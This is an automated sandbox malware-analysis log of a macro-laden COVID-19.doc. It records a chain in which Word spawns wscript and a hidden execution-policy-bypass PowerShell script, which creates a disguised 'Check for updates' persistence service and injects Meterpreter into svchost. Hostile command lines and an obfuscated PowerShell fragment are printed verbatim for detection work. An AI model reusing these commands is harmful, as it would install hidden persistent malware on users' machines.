Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1849 GetSystemDirectoryA,PathAppendA,CreateProcessA,ZwAllocateVirtualMemory,ZwWriteVirtualMemory,ZwSetContextThread,ZwResumeThread,17_2_004C1849
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\BIT36CF.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_jtn2f3ar.yfz.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F62D02_2_074F62D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FE5402_2_074FE540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FE5782_2_074FE578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F62C02_2_074F62C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F9AA92_2_074F9AA9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F9AB82_2_074F9AB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074F28C02_2_074F28C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07CF36CD2_2_07CF36CD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C305117_2_004C3051
Source: COVID-19.docOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: COVID-19.docOLE indicator, VBA macros: true
Source: 00000004.00000002.793327668.000000000469F000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.789971993.0000000000B70000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000001.00000003.656718758.0000000005DD3000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: ReflectiveLoader description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score =
Source: 00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000003.740498295.0000000000BE4000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 5108, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: wscript.exe PID: 4248, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: svchost.exe PID: 2460, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: svchost.exe PID: 2460, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 2804, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 17.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 17.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score =
Source: 17.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score =
Source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@30/27@1/4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1B15 CreateToolhelp32Snapshot,Process32First,LocalAlloc,lstrlenA,Process32Next,CloseHandle,17_2_004C1B15
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_01
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\Global\730c0a4976f1cf34stp
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\Global\730c0a4976f1cf34nps
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3828:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{5F040321-E322-4C6E-B01D-B15FD9B871F1} - OProcSessId.datJump to behavior
Source: COVID-19.docOLE indicator, Word Document stream: true
Source: COVID-19.docOLE document summary: title field not present or empty
Source: COVID-19.docOLE document summary: author field not present or empty
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc delete checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc start checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc start checkupdate
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmpJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc delete checkupdateJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C sc start checkupdateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start checkupdateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe -k netsvcsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Data Obfuscation:

barindex
Found suspicious powershell code related to unpacking or dynamic code loadingShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: Set-StrictMode -Version 2function sIZU{$BiYK=JqKKPZ '7'$BiYK}function dDJBY{$VpsSYb=AxKemD A v h e T U T I$Mm5mIV=oXkeJ F c '2' q$L2tm62=AUvxo q + O t C 9 U y W$L2tm62+$VpsSYb+$Mm5mIV}function QAQA{PaJump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C1A2F LoadLibraryA,GetProcAddress,17_2_004C1A2F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FE4F9 pushfd ; ret 2_2_074FE506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FC10F push es; ret 2_2_074FC11E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074FAA18 pushfd ; ret 2_2_074FAA25
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07CF5107 pushfd ; iretd 2_2_07CF5115
Source: unknownProcess created: C:\Windows\SysWOW64\sc.exe sc delete checkupdate
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
